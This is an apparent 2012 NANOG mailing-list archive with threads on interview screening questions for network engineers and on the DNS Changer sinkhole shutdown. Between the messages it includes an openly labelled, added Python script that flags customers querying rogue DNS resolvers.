Let the person talk do a few probing questions based off what > they say. If you yourself have any value you should be able to tell if they > have a chance. > > Also I would prefer someone who says I don't know for sure but maybe > something along these lines, and then wants to know the right answer. > Passion is also important, if you are willing to hire someone who is in it > for just a paycheck, save yourself the headache and get a contractor. > -- > Sent from my Android phone with K-9 Mail. Please excuse my brevity. > > Matthew Palmer wrote: > > On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > > Diogo Montagner writes: > > > For screening questions (for 1st level filtering), IMO, the questions > > > has to be straight to the point, for example: > > > > > > 1) What is the LSA number for an external route in OSPF? > > > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > > techinical interviewer will chech if the candidate understand the > > > differences of LSA 5 and 7. > > > > Frankly, this feels a bit like asking what the 9th byte in an IP > > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > > God gave us packet analyzers" should be counted as an acceptable > > answer. If not, you'll find yourself skipping over plenty of > > extremely well qualified candidates in favor of those who have crammed > > recently for some sort of exam in hopes of compensating for their > > short CV. > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > *defends* his use of questions like "what does the -M option to ps do?" on > the basis that "any senior person who knows what they're doing should know > all the options to ps!". No, you useless tit, anyone who knows what they're > doing should know how to read a bloody manpage. > > Trivia tests get you hiring people who know trivia. 
Knowing trivia has its > productivity benefits, but if you can't apply it, it's useless. > > - Matt > > -- > Politics and religion are just like software and hardware. They all suck, > the documentation is provably incorrect, and all the vendors tell lies. > -- Andrew Dalgleish, in the Monastery > > > -- -Matt Chung

From valdis.kletnieks at vt.edu Fri Jul 6 10:12:50 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 11:12:50 -0400 Subject: job screening question In-Reply-To: Your message of "Fri, 06 Jul 2012 17:42:42 +1000." <20120706074242.GY2221@hezmatt.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: <40593.1341587570@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: > Ugh, I know someone (thankfully no longer a current colleague) who ardently > *defends* his use of questions like "what does the -M option to ps do?" on Is that an African ps or a European ps? ;)

From nick at foobar.org Fri Jul 6 10:50:29 2012 From: nick at foobar.org (Nick Hilliard) Date: Fri, 06 Jul 2012 16:50:29 +0100 Subject: job screening question In-Reply-To: <40593.1341587570@turing-police.cc.vt.edu> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> Message-ID: <4FF70945.4050507@foobar.org> On 06/07/2012 16:12, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: > >> Ugh, I know someone (thankfully no longer a current colleague) who ardently >> *defends* his use of questions like "what does the -M option to ps do?" on > > Is that an African ps or a European ps?
;) I'll admit that I once asked a question like that in an interview, but it was only because the candidate had said that he was an expert with the "tar" command. If you're going to be that full of poop on a CV, you should expect to be called up on it. [against my advice, the candidate was hired and was a disaster. I left the company shortly afterwards.] Nick

From bill at herrin.us Fri Jul 6 11:25:52 2012 From: bill at herrin.us (William Herrin) Date: Fri, 6 Jul 2012 12:25:52 -0400 Subject: job screening question In-Reply-To: <4FF70945.4050507@foobar.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> Message-ID: On Fri, Jul 6, 2012 at 11:50 AM, Nick Hilliard wrote: > I'll admit that I once asked a question like that in an interview, but it was > only because the candidate had said that he was an expert with the "tar" > command. If you're going to be that full of poop on a CV, you should > expect to be called up on it. > > [against my advice, the candidate was hired and was a disaster. I left the > company shortly afterwards.] That sounds like the guy who on his resume under "training" listed the 3-day course and certification he got in configuring Kentrox CSU/DSUs. The limited space one has on a resume to present oneself and that's what he chose to tell me. I understand that maybe his company made him do it but there are some things you just don't admit to. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ......................
Web: Falls Church, VA 22042-3004

From eesslinger at fpu-tn.com Fri Jul 6 11:34:20 2012 From: eesslinger at fpu-tn.com (Eric J Esslinger) Date: Fri, 6 Jul 2012 11:34:20 -0500 Subject: DNS Changer items Message-ID: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> A) The DNS changer working group site http://www.dns-ok.us seems to be down for the clean people anyway. (Down for everyone agrees with me). B) Fox, CNN, and MSNBC have apparently all run stories in the last couple of hours that essentially ended with 'Call your ISP if you have any questions' (gee thanks). And I'm told the ABC/CBS/NBC are running the same basic thing tonight, with the same basic ending. The more you know... __________________________ Eric Esslinger Information Services Manager - Fayetteville Public Utilities http://www.fpu-tn.com/ (931)433-1522 ext 165 This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited.

From jared at puck.nether.net Fri Jul 6 11:40:31 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 6 Jul 2012 12:40:31 -0400 Subject: DNS Changer items In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> Message-ID: On Jul 6, 2012, at 12:34 PM, Eric J Esslinger wrote: > A) The DNS changer working group site http://www.dns-ok.us seems to be down for the clean people anyway. (Down for everyone agrees with me). Works via IPv6. (I suspect all the media attention you referenced may be causing some load issues over "Classic IP - Version 4"). - Jared puck:~$ curl -v dns-ok.us * About to connect() to dns-ok.us port 80 (#0) * Trying 2606:700::2644:c160...
connected * Connected to dns-ok.us (2606:700::2644:c160) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.21.0 (x86_64-redhat-linux-gnu) libcurl/7.21.0 NSS/3.12.10.0 zlib/1.2.5 libidn/1.18 libssh2/1.2.4 > Host: dns-ok.us > Accept: */* > < HTTP/1.1 200 OK < Date: Fri, 06 Jul 2012 16:38:50 GMT < Server: Apache/2.2.22 (Unix) PHP/5.4.4 < Last-Modified: Wed, 30 May 2012 20:51:40 GMT < ETag: "7f5c1-67e-4c1471e35bf2a" < Accept-Ranges: bytes < Content-Length: 1662 < Connection: close < Content-Type: text/html < From andrew.fried at gmail.com Fri Jul 6 12:20:55 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 13:20:55 -0400 Subject: DNS Changer items In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> Message-ID: <4FF71E77.7050307@gmail.com> The dns-ok.us site is getting crushed from all the sudden media interest. We're trying to tweak it to handle the 50,000 or so simultaneous connections. Andy Andrew Fried andrew.fried at gmail.com On 7/6/12 12:34 PM, Eric J Esslinger wrote: > A) The DNS changer working group site http://www.dns-ok.us seems to be down for the clean people anyway. (Down for everyone agrees with me). > B) Fox, CNN, and MSNBC have apparantly all run stories in the last couple of hours that essentially ended with 'Call your ISP if you have any questions' (gee thanks). And I'm told the ABC/CBS/NBC are running the same basic thing tonight, with the same basic ending. > > The more you know... > > __________________________ > Eric Esslinger > Information Services Manager - Fayetteville Public Utilities > http://www.fpu-tn.com/ > (931)433-1522 ext 165 > > This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited. 
>

From bonomi at mail.r-bonomi.com Fri Jul 6 12:23:28 2012 From: bonomi at mail.r-bonomi.com (Robert Bonomi) Date: Fri, 6 Jul 2012 12:23:28 -0500 (CDT) Subject: DNS Changer items In-Reply-To: Message-ID: <201207061723.q66HNSli059518@mail.r-bonomi.com> Jared Mauch wrote: > > On Jul 6, 2012, at 12:34 PM, Eric J Esslinger wrote: > > > A) The DNS changer working group site http://www.dns-ok.us seems to be > > down for the clean people anyway. (Down for everyone agrees with me). > > Works via IPv6. (I suspect all the media attention you referenced may be > causing some load issues over "Classic IP - Version 4"). Loaded via IPv4, albeit slowly, at least for me.

From valdis.kletnieks at vt.edu Fri Jul 6 12:44:15 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 13:44:15 -0400 Subject: DNS Changer items In-Reply-To: Your message of "Fri, 06 Jul 2012 13:20:55 -0400." <4FF71E77.7050307@gmail.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> Message-ID: <8158.1341596655@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: > The dns-ok.us site is getting crushed from all the sudden media > interest. One wonders why it's so hard to get the media interested when it would be *helpful*. DNS Changer gets traction like 3 days before the drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's to give to regionals, etc...

From sethm at rollernet.us Fri Jul 6 12:49:14 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Fri, 06 Jul 2012 10:49:14 -0700 Subject: DNS Changer items In-Reply-To: <8158.1341596655@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> Message-ID: <4FF7251A.2040003@rollernet.us> On 7/6/12 10:44 AM, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: >> The dns-ok.us site is getting crushed from all the sudden media >> interest. > > One wonders why it's so hard to get the media interested when it > would be *helpful*. DNS Changer gets traction like 3 days before the > drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's > to give to regionals, etc... > Reactive is easier to justify to the powers that be than proactive. ~Seth

From cb.list6 at gmail.com Fri Jul 6 12:52:56 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Fri, 6 Jul 2012 10:52:56 -0700 Subject: DNS Changer items In-Reply-To: <4FF7251A.2040003@rollernet.us> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: So instead of turning the servers off, would it not have been helpful to have the servers return a "captive portal" type of response saying "hey, since you use this server, you are broken, go here to get fixed" Seems that would have been a more graceful ramp down.
CB

From r.engehausen at gmail.com Fri Jul 6 13:05:13 2012 From: r.engehausen at gmail.com (Roy) Date: Fri, 06 Jul 2012 11:05:13 -0700 Subject: DNS Changer items In-Reply-To: <8158.1341596655@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> Message-ID: <4FF728D9.2050408@gmail.com> On 7/6/2012 10:44 AM, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: >> The dns-ok.us site is getting crushed from all the sudden media >> interest. > One wonders why it's so hard to get the media interested when it > would be *helpful*. DNS Changer gets traction like 3 days before the > drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's > to give to regionals, etc... Where you been? It's been in and out of the news for months. Examples: ABC covered it on April 11th, CBS on Feb 21st

From kaeo at merike.com Fri Jul 6 13:06:14 2012 From: kaeo at merike.com (Merike Kaeo) Date: Fri, 6 Jul 2012 11:06:14 -0700 Subject: DNS Changer items In-Reply-To: References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> The ISPs who have been proactive in mitigating and redirecting have been/are doing this. (global reach here) The court-ordered DNS servers have been up since Nov 9th and lots of outreach done....the intent was a graceful ramp down. Sadly, the state of folks helping with overall malware cleanup is still lots of finger pointing. FUD with press and over sensationalism not helping.
- merike On Jul 6, 2012, at 10:52 AM, Cameron Byrne wrote: > So instead of turning the servers off, would it not have been helpful to > have the servers return a "captive portal" type of response saying "hey, > since you use this server, you are broken, go here to get fixed" > > Seems that would have been a more graceful ramp down. > > CB

From valdis.kletnieks at vt.edu Fri Jul 6 13:06:36 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 14:06:36 -0400 Subject: DNS Changer items In-Reply-To: Your message of "Fri, 06 Jul 2012 10:52:56 -0700." References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: <9602.1341597996@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 10:52:56 -0700, Cameron Byrne said: > So instead of turning the servers off, would it not have been helpful to > have the servers return a "captive portal" type of response Not all DNS lookups are for HTTP.

From eesslinger at fpu-tn.com Fri Jul 6 13:10:16 2012 From: eesslinger at fpu-tn.com (Eric J Esslinger) Date: Fri, 6 Jul 2012 13:10:16 -0500 Subject: DNS Changer items In-Reply-To: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> Message-ID: <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com> We verified one a while back, who had already had the problem fixed when the FBI sent us the physical mail. Considering the number of internet customers in the US vs our internet customers, with the known number of US subscribers affected at its height, I figure if the percentages are good we've taken care of several times the number of likely cases on our network with that one customer.
*wink* I'm told by various sources to expect similar stories on the nightly national news programs tonight, with a similar 'call your isp' ending. I've also heard the site IS reachable via ipv6 and they are dealing with the load issues as we speak (and some people are getting through, albeit slowly). I'm pretty comfortable about my network; I've been catching dns lookup destinations from my users for months (not contents, just destination ip's) and the list of outside addresses covers most of the well-known public dns servers (open dns, google, etc...) with the exception of a handful that seem to be running their own full blown recursive caching servers, which go everywhere looking for authoritative lookups. (One I knew about, he complains because I won't allow his basic cable account to act as an open server for his DNS when he's out of town. If he wants a static IP I can arrange opening the port, till then... He is always welcome to VPN into his home network as well.) Been having callers look up their IP, then checking the query logs to see if they hit our dns servers. So far I'm at 100%. I thought of whipping up a script for my recursive DNS servers to set up a webpage to let them see if they were accessing those servers, but I just don't have time right now (fiscal year just started and everyone wants their projects done 'now'.) Addendum: Site appears up and fast now. So that's something anyway. __________________________ Eric Esslinger Information Services Manager - Fayetteville Public Utilities http://www.fpu-tn.com/ (931)433-1522 ext 165 > -----Original Message----- > From: Merike Kaeo [mailto:kaeo at merike.com] > Sent: Friday, July 06, 2012 1:06 PM > To: Cameron Byrne > Cc: nanog at nanog.org > Subject: Re: DNS Changer items > > > The ISPs who have been proactive in mitigating and > redirecting have been/are doing this.
(global reach here) > > The court ordered DNS servers have been up since Nov 9th and > lots of outreach done....the intent was a graceful ramp down. > Sadly, the state of folks helping with overall malware > cleanup is still lots of finger pointing. > > FUD with press and over sensationalism not helping. > > - merike > > > On Jul 6, 2012, at 10:52 AM, Cameron Byrne wrote: > > > So insteading of turning the servers off, would it not have been > > helpful to have the servers return a "captive portal" type > of reponse > > saying "hey, since you use this server, you are broken, go > here to get > > fixed" > > > > Seems that would have been a more graceful ramp down. > > > > CB > > > This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited. From andrew.fried at gmail.com Fri Jul 6 13:15:37 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 14:15:37 -0400 Subject: DNS Changer items In-Reply-To: References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> Message-ID: <4FF72B49.2020302@gmail.com> The DNS redirection began on November 8, 2011. The servers were instrumented to capture a very small portion of the dns data (source ip and port only) so that reports of infected users could be sent to the ISPs via reporting organizations like Shadowserver. Some ISPs did create walled gardens. Some merely redirected affected customers to their own internal DNS servers. Some ISPs did aggressive notifications to their users. And some ISPs did nothing. Sites were set up to allow users to check their systems (dns-ok.us, etc). The DCWG set up an information site to provide information on how to detect the DNSchanger infection and how to fix it. 
AV companies provided tools to help clean up systems, and the tools were published on the DCWG.org website. The FBI went to great lengths to get press coverage to get the word out. This operation has been ongoing for 7 months, 27 days and 14 hours. How much more of a graceful ramp down could there have been? Andy Andrew Fried andrew.fried at gmail.com On 7/6/12 1:52 PM, Cameron Byrne wrote: > So insteading of turning the servers off, would it not have been helpful to > have the servers return a "captive portal" type of reponse saying "hey, > since you use this server, you are broken, go here to get fixed" > > Seems that would have been a more graceful ramp down. > > CB > From r.engehausen at gmail.com Fri Jul 6 13:35:45 2012 From: r.engehausen at gmail.com (Roy) Date: Fri, 06 Jul 2012 11:35:45 -0700 Subject: DNS Changer items In-Reply-To: <9602.1341597996@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <9602.1341597996@turing-police.cc.vt.edu> Message-ID: <4FF73001.4010809@gmail.com> On 7/6/2012 11:06 AM, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 10:52:56 -0700, Cameron Byrne said: >> So insteading of turning the servers off, would it not have been helpful to >> have the servers return a "captive portal" type of reponse > Not all DNS lookups are for HTTP. If you turn the servers off, then everything fails. The user sits there bewildered and calls his/her ISP to report the Internet is down. If HTTP was pointed to a server that had a page that said what the problem is and what to do, it would be a lot better. Any tech support these users call can diagnose the problem in a few seconds. 
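Eric's destination-only query logging and the source-IP sinkhole reports Andy describes converge on the same ISP-side job: work out which customers are still sending DNS to the rogue resolvers before those go dark, without mistaking the customers who run their own recursive servers for infected ones. The script below is an added example in Python, not the DCWG's code nor anything posted in the thread; every address is constructed from the RFC 5737 and RFC 2544 documentation and benchmarking ranges, and the rogue prefix list is a placeholder for the ranges the DCWG published.

```python
"""ISP-side DNSChanger triage over destination-only DNS flow records.
Added example, not code from the DCWG or from any poster in the thread.
Addresses are constructed from documentation ranges; ROGUE_RESOLVER_NETS
is a PLACEHOLDER for the rogue resolver prefixes the DCWG published.
"""
import ipaddress
from collections import defaultdict

# PLACEHOLDER: replace with the published rogue resolver prefixes.
ROGUE_RESOLVER_NETS = [ipaddress.ip_network("203.0.113.0/24")]
# Constructed: this ISP's own recursive resolvers.
OUR_RESOLVERS = {ipaddress.ip_address(a) for a in ("192.0.2.53", "192.0.2.54")}
# Well-known public resolvers (Google Public DNS, OpenDNS).
PUBLIC_RESOLVERS = {ipaddress.ip_address(a) for a in
                    ("8.8.8.8", "8.8.4.4", "208.67.222.222", "208.67.220.220")}
# More distinct port-53 destinations than this means the customer runs a
# recursive server of its own and walks the authoritative tree itself
# (the handful Eric mentions); that is not an infection.
OWN_RECURSOR_THRESHOLD = 10

# Constructed flow records "<epoch> <customer_ip> <dst_ip> <dst_port>";
# query contents were never kept, only destinations.
SAMPLE_FLOWS = """\
1341590000 198.51.100.10 192.0.2.53 53
1341590001 198.51.100.10 192.0.2.54 53
1341590002 198.51.100.11 8.8.8.8 53
1341590003 198.51.100.11 192.0.2.53 53
1341590004 198.51.100.12 203.0.113.7 53
1341590005 198.51.100.12 192.0.2.53 53
1341590006 198.51.100.13 192.0.2.53 443
garbage line that must be skipped
""" + "\n".join(  # customer .20 runs its own recursor: 12 distinct targets
    f"13415900{10 + i:02d} 198.51.100.20 198.18.{i}.1 53" for i in range(12))

# Constructed sinkhole report as a reporting organisation might forward it:
# only what the court-ordered servers recorded (time, source IP, source port).
SAMPLE_REPORT = """\
timestamp,src_ip,src_port
2012-07-06T12:00:00Z,198.51.100.14,51234
2012-07-06T12:00:05Z,not-an-address,51235
"""


def parse_flow(line):
    """Return (customer, dst_addr, dst_port) for a well-formed record, else None."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        return (str(ipaddress.ip_address(parts[1])),
                ipaddress.ip_address(parts[2]), int(parts[3]))
    except ValueError:
        return None


def classify_customers(flow_text):
    """Map each customer seen on port 53 to one verdict; one rogue contact
    is enough, since the infection rewrites the resolver setting."""
    dests = defaultdict(set)
    for line in flow_text.splitlines():
        rec = parse_flow(line)
        if rec is not None and rec[2] == 53:
            dests[rec[0]].add(rec[1])
    verdicts = {}
    for cust, addrs in dests.items():
        others = addrs - OUR_RESOLVERS - PUBLIC_RESOLVERS
        if any(a in net for net in ROGUE_RESOLVER_NETS for a in addrs):
            verdicts[cust] = "rogue"
        elif len(others) > OWN_RECURSOR_THRESHOLD:
            verdicts[cust] = "own-recursor"
        elif others:
            verdicts[cust] = "unknown-resolver"  # review by hand
        elif addrs & PUBLIC_RESOLVERS:
            verdicts[cust] = "public"
        else:
            verdicts[cust] = "ours"
    return verdicts


def merge_sinkhole_report(verdicts, report_text):
    """Customers named in a sinkhole report are rogue whatever the flows say."""
    merged = dict(verdicts)
    for line in report_text.splitlines()[1:]:  # skip the CSV header
        fields = line.split(",")
        if len(fields) != 3:
            continue
        try:
            merged[str(ipaddress.ip_address(fields[1].strip()))] = "rogue"
        except ValueError:
            continue  # malformed row, skip it
    return merged


def notify_list(verdicts):
    """Customers to contact before the court-ordered resolvers go dark."""
    return sorted(c for c, v in verdicts.items() if v == "rogue")


if __name__ == "__main__":
    v = merge_sinkhole_report(classify_customers(SAMPLE_FLOWS), SAMPLE_REPORT)
    print("notify:", ", ".join(notify_list(v)))
```

With the sample data the only notifications are 198.51.100.12 (seen talking to the placeholder rogue range) and 198.51.100.14 (named in the report); the customer fanning out to twelve addresses is classed as running its own recursor, not as infected.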
From kmedcalf at dessus.com Fri Jul 6 13:41:41 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Fri, 06 Jul 2012 12:41:41 -0600 Subject: job screening question In-Reply-To: Message-ID: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com> My response would be "insufficient information provided for meaningful diagnosis". The following could be issues:
... the user does not have a computer
... the computer is not turned on
... the keyboard is not plugged in
... the user is a quadriplegic and cannot use the mouse or keyboard
... the user is blind and cannot find the computer
... the user has a computer but is not connected to a network
... the monitor is not turned on
... the brightness is turned down too far on the monitor
... the user is dead
How does the user know that it cannot access the web site? --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org > -----Original Message----- > From: Matt Chung [mailto:itsmemattchung at gmail.com] > Sent: Friday, 06 July, 2012 08:20 > To: joseph.snyder at gmail.com > Cc: nanog at nanog.org > Subject: Re: job screening question > > A former manager of mine once told me you can gauge a person's understanding > by the questions they ask and I personally agree with this statement. Most > of us will be able to make a reasonable assessment of the person by > listening to the content of their questions. I'm not looking for an > immediate resolution, but trying to understand the thought process of the > individual. I feel realistic scenarios provide some insight on the > individual's analytical skills. > > "A client cannot access the website "http://xyz.com". What do you do to > troubleshoot this issue?" > > Depending on the candidate, I've seen a variety of answers: > 1) "Can you ping the device?" > 2) "Can you access the gateway?"
> 3) "What does the running config look like on the router" > 4) "Is there a firewall in between" > > I believe these questions may be asked in the right context provided there > is enough information to isolate the issue to the network however the > statement is devoid of anything useful that would make the network suspect. > I would like to hear some questions such as: > > "are other websites accessible? Or is the only website the client is > experiencing issues with?" > "was the website working previously? when did it start happening?" > "what does the client see on their screen ? are they getting an error?" > > These questions reflect the persons ability to accurately understand the > problem before deep diving into the technical details. From there, you can > get more technical. "Client is receiving an HTTP 404 error." Great, rule > out network since this is an application layer response... > > just my .02. > > On Fri, Jul 6, 2012 at 8:28 AM, wrote: > > > I agree. Let the person talk do a few probing questions based off what > > they say. If you yourself have any value you should be able to tell if they > > have a chance. > > > > Also I would prefer someone who says I don't know for sure but maybe > > something along these lines, and then wants to know the right answer. > > Passion is also important, if you are willing to hire someone who is in it > > for just a paycheck, save yourself the headache and get a contractor. > > -- > > Sent from my Android phone with K-9 Mail. Please excuse my brevity. > > > > Matthew Palmer wrote: > > > > On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > > > Diogo Montagner writes: > > > > For screening questions (for 1st level filtering), IMO, the questions > > > > has to be straight to the point, for example: > > > > > > > > 1) What is the LSA number for an external route in OSPF? > > > > > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > > > answer 5, 7 or 5 and 7. 
Later on (the next level of the interview), a > > > > techinical interviewer will chech if the candidate understand the > > > > differences of LSA 5 and 7. > > > > > > Frankly, this feels a bit like asking what the 9th byte in an IP > > > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > > > God gave us packet analyzers" should be counted as an acceptable > > > answer. If not, you'll find yourself skipping over plenty of > > > extremely well qualified candidates in favor of those who have crammed > > > recently for some sort of exam in hopes of compensating for their > > > short CV. > > > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > > *defends* his use of questions like "what does the -M option to ps do?" on > > the basis that "any senior person who knows what they're doing should know > > all the options to ps!". No, you useless tit, anyone who knows what they're > > doing should know how to read a bloody manpage. > > > > Trivia tests get you hiring people who know trivia. Knowing trivia has it's > > productivity benefits, but if you can't apply it, it's useless. > > > > - Matt > > > > -- > > Politics and religion are just like software and hardware. They all suck, > > the documentation is provably incorrect, and all the vendors tell lies. 
> > -- Andrew Dalgleish, in the Monastery > > > > > > > > > -- > -Matt Chung From mpalmer at hezmatt.org Fri Jul 6 13:46:31 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Sat, 7 Jul 2012 04:46:31 +1000 Subject: job screening question In-Reply-To: <40593.1341587570@turing-police.cc.vt.edu> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> Message-ID: <20120706184631.GA2221@hezmatt.org> On Fri, Jul 06, 2012 at 11:12:50AM -0400, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: > > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > > *defends* his use of questions like "what does the -M option to ps do?" on > > Is that an African ps or a European ps? ;) That was actually the reason why he picked on ps in particular -- because it had two completely different command sets and yes, he expects candidates to know the difference. - Matt -- Ideas are like rabbits. You get a couple and learn how to handle them, and pretty soon you have a dozen. -- John Steinbeck From owen at delong.com Fri Jul 6 13:53:28 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 6 Jul 2012 11:53:28 -0700 Subject: job screening question In-Reply-To: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com> References: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com> Message-ID: <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> On Jul 6, 2012, at 11:41 AM, Keith Medcalf wrote: > > My response would be "insufficient information provided for meaningful diagnosis". > > The following could be issues: > ... the user does not have a computer > ... the computer is not turned on > ... the keyboard is not plugged in > ... the user is a quadraplegic and cannot use the mouse or keyboard > ... the user is blind and cannot find the computer > ... the user has a computer but is not connected to a network > ... the monitor is not turned on > ... 
the brightness is turned down too far on the monitor > ... the user is dead I would argue that the fact the user filed a ticket/contacted the helpdesk/whatever to raise the issue indicates that the user probably isn't dead. The rest are semi-legitimate somewhat amusing answers, but you missed many possibilities. When providing such a list of answers, always include an etc. at the end so as to indicate your understanding that the list is not complete. ;-) > How does the user know that it cannot access the web site? When did users become things? Probably a candidate that made this mistake should be dismissed from consideration on that basis alone. Owen > >> -----Original Message----- >> From: Matt Chung [mailto:itsmemattchung at gmail.com] >> Sent: Friday, 06 July, 2012 08:20 >> To: joseph.snyder at gmail.com >> Cc: nanog at nanog.org >> Subject: Re: job screening question >> >> A former manager of mine once told me you can gauge a persons understanding >> by the questions they ask and I personally agree with this statement. Most >> of us will be able to make a reasonable assessment of the person by >> listening to the content of their questions. I'm not looking for an >> immediate resolution, but trying to understand the thought process of the >> individual. I feel realistic scenarios provide some insight on the >> individual's analytical skills. >> >> "A client cannot access the website "http://xyz.com". What do you do to >> troubleshoot this issue?" >> >> Depending on the candidate, I've seen a variety of answers: >> 1) "Can you ping the device?" >> 2) "Can you access the gateway?" >> 3) "What does the running config look like on the router" >> 4) "Is there a firewall in between" >> >> I believe these questions may be asked in the right context provided there >> is enough information to isolate the issue to the network however the >> statement is devoid of anything useful that would make the network suspect. 
>> I would like to hear some questions such as: >> >> "are other websites accessible? Or is the only website the client is >> experiencing issues with?" >> "was the website working previously? when did it start happening?" >> "what does the client see on their screen ? are they getting an error?" >> >> These questions reflect the persons ability to accurately understand the >> problem before deep diving into the technical details. From there, you can >> get more technical. "Client is receiving an HTTP 404 error." Great, rule >> out network since this is an application layer response... >> >> just my .02. >> >> On Fri, Jul 6, 2012 at 8:28 AM, wrote: >> >>> I agree. Let the person talk do a few probing questions based off what >>> they say. If you yourself have any value you should be able to tell if they >>> have a chance. >>> >>> Also I would prefer someone who says I don't know for sure but maybe >>> something along these lines, and then wants to know the right answer. >>> Passion is also important, if you are willing to hire someone who is in it >>> for just a paycheck, save yourself the headache and get a contractor. >>> -- >>> Sent from my Android phone with K-9 Mail. Please excuse my brevity. >>> >>> Matthew Palmer wrote: >>> >>> On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: >>>> Diogo Montagner writes: >>>>> For screening questions (for 1st level filtering), IMO, the questions >>>>> has to be straight to the point, for example: >>>>> >>>>> 1) What is the LSA number for an external route in OSPF? >>>>> >>>>> This can have two answer: 5 or 7. So, I will accept if the candidate >>>>> answer 5, 7 or 5 and 7. Later on (the next level of the interview), a 